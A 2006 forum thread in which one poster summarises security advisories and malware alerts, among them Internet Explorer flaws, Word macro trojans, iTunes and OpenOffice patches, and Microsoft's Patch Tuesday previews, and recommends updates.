http://www.frsirt.com/english/advisories/2006/25531) An error in the handling of redirections can be exploited to access documents served from another web site via the “object.documentElement.outerHTML” property.
2) An error in the handling of file shares can be exploited to trick a user into executing a malicious HTA application via directory traversal attacks in the filename. Successful exploitation requires some user interaction.
The vulnerabilities have been confirmed on a fully patched system with Internet Explorer 6.0 and Microsoft Windows XP SP2. Other versions may also be affected.
Solution:
1) Disable Active Scripting support.
2) Filter Windows file sharing traffic.ISC Testing Note: Regarding the second vulnerability, what’s interesting is that we were able to reproduce this even when using Mozilla FireFox.
-
June 28, 2006 at 3:37 pm #3111787
Kukudro-A – MS Word attack spammed in email
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Sophos has declared MEDIUM RISK (3 out of 5 rating) for this new spammed email attack, although other AV vendors have this at low risk currently.
Kukudro-A – MS Word attack spammed in email
http://secunia.com/virus_information/30331/
http://www.sophos.com/security/analyses/wm97kukudroa.html
http://secunia.com/virus_information/30366/w97mkukudro/
http://www.sarc.com/avcenter/venc/data/w97m.kukudro.a.htmlExample of spammed message
http://www.sophos.com/images/common/misc/kukudrdoc.gif
SUMMARY: W97M/Kukudro is a macro trojan that arrives as a Zip file attachment, containing a Word document — which drops and executes a Downloader trojan on the victims computer. . Sophos has seen the Trojan horse spammed out in email messages with the following Subjects: “worth to see”, “prices”, “Hi”, or “Hello”. It uses a very old vulnerability in Microsoft Word MS01-034 where the malicious code can be automatically run just by viewing the document that contains it (impacting mostly unpatched Office 2000 users).RECOMMENDATION: Stay up-to-date on AV protection and avoid all spam or untrusted URLs/attachments in your email
-
June 30, 2006 at 1:15 pm #3112927
Stolen Laptop with info on 26 million Veteran’s recovered
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
According to media reports, the laptop was stolen from the home, sold for $100, and had not been booted up beyond the password prompt (as it was password protected under XP or 2000). Thankfully, this appears to be more of a random burglary, than someone looking to conduct indentity theft on a massive scale.
Still, when we put on our security hats, we know that much more could be possible. Let’s hope for a good outcome on this
Stolen Laptop with info on 26 million Veteran’s recovered
http://www.gcn.com/online/vol1_no1/41204-1.htmlQUOTE: The Veterans Affairs Department said today that law enforcement officials had recovered the stolen laptop containing the personal data of more than 26 million veterans, and that initially it looks as though the data has not been accessed
The FBI said in a statement that a preliminary review of the equipment by the computer forensics team has determined that the database remains intact and has not been accessed since the laptop was stolen
-
June 30, 2006 at 2:42 pm #3112889
New Open Office Vulnerabilities – Security release v2.0.3 available
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
It’s important to stay up-to-date on all software products. New vulnerabilities were recently discovered for Open Office 2.0 and all users should move to the latest release
New Open Office Vulnerabilities – Security release v2.0.3 available
http://www.incidents.org/diary.php?storyid=1454
http://www.openoffice.org/security/bulletin-20060629.htmlSecurity Bulletin 2006-06-29 — OpenOffice.org 2.0.3 fixes three security vulnerabilites that have been found through internal security audits. Although there are currently no known exploits, we urge all users of 2.0.x prior to 2.0.2 to upgrade to the new version or install their vendor’s patches accordingly. Patches for users of OpenOffice.org 1.1.5 will be available shortly.
-
June 30, 2006 at 2:42 pm #3112888
OSX.Leap.A – New Mac OSX Trojan Horse
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
OSX.Leap.A is a new trojan horse that targets the Macintosh OS X and spreads via iChat Instant Messenger program.
OSX.Leap.A – New Mac OSX Trojan Horse
http://secunia.com/virus_information/27059/osxleap-a/
http://secunia.com/virus_information/30445/osx.exploit.launchd/
http://www.sarc.com/avcenter/venc/data/osx.exploit.launchd.html
http://www.theregister.co.uk/2006/02/16/mac_os-x_virus/OSX.Exploit.Launchd is a Trojan horse that exploits the Apple Mac OS X LaunchD Local Format String Vulnerability (as described in Security Focus BID 18724). It provides root access on the Macintosh OSX version 10.4.6 or earlier.
-
June 30, 2006 at 4:33 pm #3112852
Cuebot-K IM Worm – Hides as a Windows Genuine Advantage Service
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Users should always be careful to avoid processing files or URLs in the Instant Messaging environment. This new IM threat disguises itself like the new WGA process Microsoft is using to ensure the Windows OS has the proper license control keys.
Cuebot-K IM Worm – Hides as a Windows Genuine Advantage (WGA) Service
http://secunia.com/virus_information/30450/cuebot-k/
http://www.sophos.com/security/analyses/w32cuebotk.htmlW32/Cuebot-K is a instant messaging worm and backdoor for the Windows platform. W32/Cuebot-K spreads via AOL Instant Messenger. The file wgavn.exe is registered as a new system driver service named “wgavn”, with a display name of “Windows Genuine Advantage Validation Notification” and a startup type of automatic, so that it is started automatically during system startup.
-
July 1, 2006 at 8:32 am #3111318
BKDR_IRCBOT.DB – Trend info for new WGA disguised malware
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Trend provides an excellent write-up and also offers AV protection for this new attack approach.
BKDR_IRCBOT.DB – Trend info for new WGA disguised malware
http://secunia.com/virus_information/30453/bkdrircbot.db/
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=BKDR%5FIRCBOT%2EDB&VSect=T
Technical Diagram of Infection Techniques
http://www.trendmicro.com/vinfo/images/BKDR_IRCBOT_DB_img2.gifQUOTE: It modifies the registry so that, when executed, it displays a name in the Windows Task Manager that sounds similar to a legitimate application. By doing the said action, it tricks users into thinking that it is a legitimate process. It also modifies the registry to disable several system services. The said routine leaves users more vulnerable to attacks. Using a random port, this backdoor connects to a random Internet Relay Chat (IRC) server, then joins a random IRC channel. Once connected, it performs certain commands on the affected system, thus compromising system security. In addition, it attempts to connect to several URLs. The said action consumes system bandwidth.
-
July 1, 2006 at 8:32 am #3111319
3COM’s Zero Day Initiative Security site – Tracks Zero Day risks
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The first link is a good resource to look at for major new POC or in-the-wild exploit developments. There are differing interpretations of what “zero day” means. This list still represents unpatched software vulnerabilities where test or even harmful code has been developed. Most importantly they don’t publish exploit code and maintain confidentiality on the detailed elements of the risk.
3COM’s Zero Day Initiative Security site – Tracks Zero Day risks
http://www.zerodayinitiative.com/advisories.htmlHome Page
http://www.zerodayinitiative.com/Details about 3Com’s programs
http://www.zerodayinitiative.com/details.htmlQUOTE: The Zero Day Initiative (ZDI) is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com later provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
-
July 1, 2006 at 8:32 am #3111320
Apple iTunes Software – Update to latest version for protection
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
All users of Apple iTunes should patch their systems to the latest versions promptly due to critical vulnerabilities which have been patched.
Apple iTunes Software – Update to latest version for protection
http://www.frsirt.com/english/advisories/2006/2601
http://docs.info.apple.com/article.html?artnum=303952
http://www.zerodayinitiative.com/advisories/ZDI-06-020.htmlAdvisory ID : FrSIRT/ADV-2006-2601
CVE ID : CVE-2006-1467
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-06-29Technical Description: A vulnerability has been identified in Apple iTunes, which could be exploited by remote attackers to take complete control of an affected system. This flaw is due to an integer overflow error in the AAC file parsing code that does not properly handle a malformed “sample_size_table” value, which could be exploited by remote attackers to crash a vulnerable application or execute arbitrary commands by tricking a user into opening a specially crafted AAC file.
Affected Products: Apple iTunes version 6.0.4 and prior
Solution: Upgrade to Apple iTunes version 6.0.5
http://www.apple.com/itunes/download/ -
July 2, 2006 at 8:31 pm #3111023
Windows WGA – Microsoft shares latest directions
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
Microsoft shares updated information on WGA in the blog post below. Most notably they do not plan to turn off copies of Windows that are non-WGA compliant as rumored
Windows Genuine Advantage – Misperceptions about WGA
http://blogs.msdn.com/wga/archive/2006/06/30/652818.aspxQUOTE: With all of the recent interest in WGA over the past month, I wanted to take a moment to clarify a few of the misperceptions out there and hopefully bring some clarity about what the program is intended to do. First, I?d like to revisit the announcement that was made earlier this week about the updates to the WGA Notifications program. Starting on Tuesday a new version of WGA Notifications was released. There were two significant changes made based on customer feedback.
1) A daily configuration check, or ?phone home? feature as it was reported in some places, existed in the pilot phase in order to determine if the notifications should run or not and how often. This configuration check was removed.
2) We also replaced the End User License Agreement (EULA) with a standard General Availability EULA that more clearly explains the purpose of the software and provides details about WGA Notifications. In addition, for customers who choose not to install the updated package, and wish to remove an installed pre-release version a Knowledge Base article has been made available.
Second, there is a rumor floating around that Microsoft is planning to use WGA to implement a ?kill switch? for PCs that fail validation. Microsoft anti-piracy technologies cannot and will not turn off your computer. In our ongoing fight against piracy, we are constantly finding and closing loopholes pirates use to circumvent established policies.
-
July 4, 2006 at 4:40 am #3168712
Internet Explorer – New HHCtrl and ActiveX DoS vulnerabilities
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
These are brand new vulnerabilities for Internet Explorer risk” and proof-of-concept exploits have been developed.
Microsoft Internet Explorer HTML Help Control “HHCtrl” Memory Corruption Vulnerability
http://www.frsirt.com/english/advisories/2006/2635Advisory ID : FrSIRT/ADV-2006-2635
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-03Technical Description: A vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by remote attackers to crash a vulnerable browser or potentially take complete control of an affected system. This flaw is due to a memory corruption error in the HTML Help Control “HHCtrl” when processing a specially crafted property, which could be exploited by attackers to cause a denial of service or execute arbitrary commands by convincing a user to visit a specially crafted Web page.
Microsoft Internet Explorer Data Access ActiveX Remote Denial of Service Vulnerability
http://www.frsirt.com/english/advisories/2006/2634Advisory ID : FrSIRT/ADV-2006-2634
Rated as : Low Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-03Technical Description: A vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to cause a denial of service. This flaw is due to a NULL pointer dereference error in the Microsoft Data Access ActiveX “msado15.dll” object when handling a specially crafted property, which could be exploited by attackers to crash a vulnerable browser by tricking a user into visiting a malicious web page.
There may be developments as the ISC documents one site plans to discover and publish a new browser bug each day during July according to the blog entry.
Internet Storm Center Commentary – Browser Bug of Month Club
http://www.incidents.org/diary.php?storyid=1459 -
July 4, 2006 at 8:29 am #3168675
W32.Gatt – Uses IDC file extension type
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The use of the IDC file extension type as a means to spread viruses may not be that common and may need to be added to the blocking list if further developments occur.
W32.Gatt – Uses IDC file extension type
http://www.sarc.com/avcenter/venc/data/w32.gatt.htmlW32.Gatt is a polymorphic entry point-obscuring infector of .IDC files. .IDC files are scripts for the Interactive Disassembler application. The virus is a proof of concept malware and does nothing but replicate. Whenever an infected IDC file is executed, the virus will create a randomly-named .EXE file in the current directory, and execute that file. This newly created .EXE file will infect all .IDC files in the current directory and all subdirectories.
-
July 6, 2006 at 11:41 am #3166881
TROJ_NANISTYL.A – New Excel POC impacting Japanese/Chinese versions
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
This is not an active threat and it illustrates that development and testing of potential MS Office exploits continues.
TROJ_NANISTYL.A – New Excel POC impacting Japanese/Chinese versions
http://secunia.com/virus_information/30540/trojnanistyl.a/QUOTE: This Trojan is a proof-of-concept exploit that takes advantage of an unknown remote code execution vulnerability, which causes Japanese and Chinese versions of Microsoft Excel 2000 to crash on affected systems. Currently, however, this Trojan sample does not have a shell code. It runs on Windows XP and Server 2003.
-
July 6, 2006 at 3:39 pm #3167825
Microsoft July Updates – Seven security releases planned for Patch Tuesday
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
July will represent another important month for security updates
Microsoft July Updates – Info for Patch Tuesday
http://www.microsoft.com/technet/security/bulletin/advance.mspxQUOTE: On 11 July 2006 Microsoft is planning to release:
? Four Microsoft Security Bulletins affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical. These updates will be detectable using the Microsoft Baseline Security Analyzer and the Enterprise Scan Tool. Some of these updates will require a restart.
? Three Microsoft Security Bulletins affecting Microsoft Office. The highest Maximum Severity rating for these is Critical. These updates will be detectable using the Microsoft Baseline Security Analyzer. These updates may require a restart. -
July 6, 2006 at 3:39 pm #3167826
Microsoft TechNet – New Regulatory Compliance Site
by harry waldron, cpcu, ccp · about 17 years, 9 months ago
In reply to Harry Waldron
The July Technet newsletter highlights a new site devoted to assisting companies in research efforts toward compliance related to five primary regulatory standards, (including SOX). This new site should be used as a complimentary resource with precedence to the official sites first
Microsoft TechNet – New Regulatory Compliance Site
Regulations and Standards. This section provides an overview of the five major regulations and standards that this guide discusses:
? Sarbanes-Oxley Act (SOX)
? Gramm-Leach-Bliley Act (GLBA)
? Health Insurance Portability and Accountability Act (HIPAA)
? European Union Data Protection Directive (EUDPD)
? ISO 17799:2005 Code of Practice for Information Security Management (ISO 17799)
IT Controls. This section discusses the various types of IT controls, how these controls work in combination, and why they are important components that your organization can use to help meet its regulatory compliance obligations.
IT Audit Process. This section provides an overview of the IT audit process that auditors use to assess regulatory compliance for most organizations.
Business Drivers. This section discusses the business drivers for regulatory compliance that include challenges concerning regulatory environment complexity, achieving and maintaining compliance, and the consequences of noncompliance. It also discusses opportunities to establish and improve process, gain competitive advantage, and increase ROI for your organization through time and cost savings.
-
August 16, 2006 at 8:50 pm #3199280
MS06-047: Trojan.Mdropper.N – Exploits Word vulnerability patched in August
by harry waldron, cpcu, ccp · about 17 years, 7 months ago
In reply to Harry Waldron
Microsoft Office had several security updates in July and August. All users should be careful of suspicious documents, apply the latest service packs, and install all Office updates.
MS06-047: Trojan.Mdropper.N – Exploits Word vulnerability patched in August
http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2006-081616-2104-99QUOTE – Trojan.Mdropper.N is a Trojan horse that exploits the Microsoft Visual Basic for Applications Document Check Buffer Overflow Vulnerability (as described in Microsof Security Bulletin MS06-047) and attempts to drop a file on the compromised computer. The Trojan is a Microsoft Word document reportedly named: syosetu.doc
-
August 24, 2006 at 5:39 am #3199774
MS06-042 Re-release postponed to ensure Quality
by harry waldron, cpcu, ccp · about 17 years, 7 months ago
In reply to Harry Waldron
CERT has issued an advisory and Microsoft has updated their advisory regarding long URL strings that can a buffer overflow condition. The August 22nd release was postponed, so that QA issues could be fully resolved.
CERT – Microsoft Internet Explorer long URL buffer overflow
http://www.kb.cert.org/vuls/id/821156QUOTE: Microsoft Internet Explorer 6 Service Pack 1 on Windows 2000 and Windows XP SP1 contains a vulnerability when viewing a web site using the HTTP 1.1 protocol. If the web site uses HTTP 1.1 compression and contains an overly long URL, a buffer overflow can occur. Note that this vulnerability was introduced with the first release of the MS06-042 updates on August 8, 2006.
MS06-042 Re-release postponed to ensure Quality
http://blogs.technet.com/msrc/archive/2006/08/22/448689.aspxQUOTE: On August 15, 2006 Microsoft announced that it would be re-releasing MS06-042 Tuesday, August 22, 2006 to address an issue affecting Internet Explorer 6 Service Pack 1 customers discussed in Microsoft Knowledge Base Article 923762. Due to an issue discovered in final testing, Microsoft will not be re-releasing MS06-042 today. This update will be re-released for Internet Explorer 6 Service Pack 1 when it meets an appropriate level of quality for broad distribution.
Additional Links:
Microsoft Security Advisory (923762)
http://www.microsoft.com/technet/security/advisory/923762.mspxSecunia
http://secunia.com/advisories/21557/FrSIRT
http://www.frsirt.com/english/advisories/2006/3356
Security Focus
http://www.securityfocus.com/news/11408 -
August 24, 2006 at 5:41 am #3199772
That won’t fly, how new airplane rules could affect you
by harry waldron, cpcu, ccp · about 17 years, 7 months ago
In reply to Harry Waldron
This article from Network World was highlighted in the morning email and documents some of the key changes associated with the new airline restrictions.
Article: That won’t fly, how new airplane rules could affect you
By: M. E. Kabay
As readers will no doubt be aware, on Aug. 10, British police arrested 21 people suspected of plotting to blow up planes flying from the U.K. to the U.S.
http://news.bbc.co.uk/2/hi/uk_news/4778575.stm
In the wake of these police actions, the U.K. Department of Transport issued new, stricter regulations limiting what passengers can take into aircraft cabins.
The press release of Aug. 10
http://news.bbc.co.uk/2/hi/uk_news/4778615.stm
This specifically allows only the following – and everything must be placed in a transparent plastic bag, not in pockets (quoting exactly):
* Pocket-size wallets and pocket-size purses plus contents (for example money, credit cards, identity cards etc (not handbags)
* Travel documents essential for the journey (for example passports and travel tickets)
* Prescription medicines and medical items sufficient and essential for the flight (e.g., diabetic kit), except in liquid form unless verified as authentic
* Spectacles and sunglasses, without cases
* Contact lens holders, without bottles of solution
* For those traveling with an infant: baby food, milk (the contents of each bottle must be tasted by the accompanying passenger) and sanitary items sufficient and essential for the flight (nappies, wipes, creams and nappy disposal bags)
* Female sanitary items sufficient and essential for the flight, if unboxed (e.g. tampons, pads, towels and wipes)
* Tissues (unboxed) and/or handkerchiefs
* Keys (but no electrical key fobs).
All other belongings must be stowed in checked luggage.
As I read these rules, business travelers, such as the readers of this column, who may need to fly to the U.K. and back from the U.S. will have to consider some information security issues.
First of all, nobody is going to be bringing laptop computers, cell phones, PDAs or even watches onto the aircraft. That restriction means that confidential information stored on such devices may now be exposed to greater threat than if the devices were kept with the passenger. Anyone planning to allow baggage handlers to have access to laptop computers and such would do well to act on security experts’ repeated pleas to use disk encryption.
On a personal note, my PDA uses strong encryption for confidential data, and my watch has a password on the “Note” section where I store such things as bank account numbers.
Not having your computer with you on a transatlantic flight may change your perspective on the productivity costs of international travel. I recommend you bring a good book, because you sure aren’t going to be answering e-mail, writing that management report you intended to finish, or even watching DVDs or listening to CDs or your iPod. And forget the sound suppressing earphones: I don’t see those on the approved list, either.
It is possible that we will see an increase in the relative value of electronic conferencing, perhaps including Web-camera feeds for videoconferencing in lieu of physical transatlantic meetings. If similar restrictions come to be applied in the U.S., the same cost/benefit calculations may reduce business air travel and increase virtual meetings. We will have to pay better attention to the security of such communications; VPNs will become standard operating procedures for any kind of confidential information interchange at such meetings.
-
September 11, 2006 at 8:07 am #3200361
Microsoft Security Updates Preview – September 2006
by harry waldron, cpcu, ccp · about 17 years, 6 months ago
In reply to Harry Waldron
Two Windows and one Office Update are scheduled for September 13, 2006. Home and corporate users should quickly implement these latest protective patches.
Microsoft Security Updates Preview – September 2006
http://www.microsoft.com/technet/security/bulletin/advance.mspx
-
-
AuthorReplies